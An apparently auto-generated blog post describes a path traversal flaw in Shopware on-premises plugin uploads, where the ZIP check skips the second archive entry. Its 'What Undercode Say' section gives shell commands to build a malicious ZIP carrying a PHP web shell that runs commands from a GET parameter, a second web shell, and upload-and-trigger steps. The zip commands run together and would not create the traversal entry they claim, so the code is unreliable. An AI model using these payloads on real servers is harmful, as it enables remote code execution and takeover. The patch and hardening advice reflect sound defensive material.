Listen to this Post
The vulnerability exists within the plugin upload mechanism of the on-premises Shopware installation. The application attempts to prevent path traversal by scanning entries in an uploaded plugin ZIP file for the forbidden “..” parent directory sequence. However, this security check has a critical flaw: it only starts scanning from the third entry (index 2) in the ZIP archive. The second entry (index 1) is not subjected to this check. An attacker with admin privileges can craft a malicious ZIP file where the second entry uses “../” sequences in its file path. When this ZIP is processed, the file from the unchecked second entry is extracted to an arbitrary location outside the intended `/var/www/html/custom/apps` directory, such as the web root. By placing a PHP web shell there, the attacker gains persistent remote code execution on the server.
Platform: Shopware On-Premises
Version: < 6.3.5.3
Vulnerability: Path Traversal
Severity: Critical
date: 2020-12-15
Prediction: Patch Available
What Undercode Say:
Create a malicious ZIP file with a second entry that traverses directories echo "<?php system(\$_GET['cmd']); ?>" > evil.php zip malicious.zip valid_file.txt zip malicious.zip "../../../var/www/html/public/evil.php" < evil.php
// Example of a simple PHP web shell (evil.php)
<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>
How Exploit:
Craft malicious ZIP.
Upload as plugin.
Trigger web shell.
Protection from this CVE
Update to 6.3.5.3.
Implement strict file permissions.
Apply principle of least privilege.
Impact:
Arbitrary File Write
Remote Code Execution
Full System Compromise
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
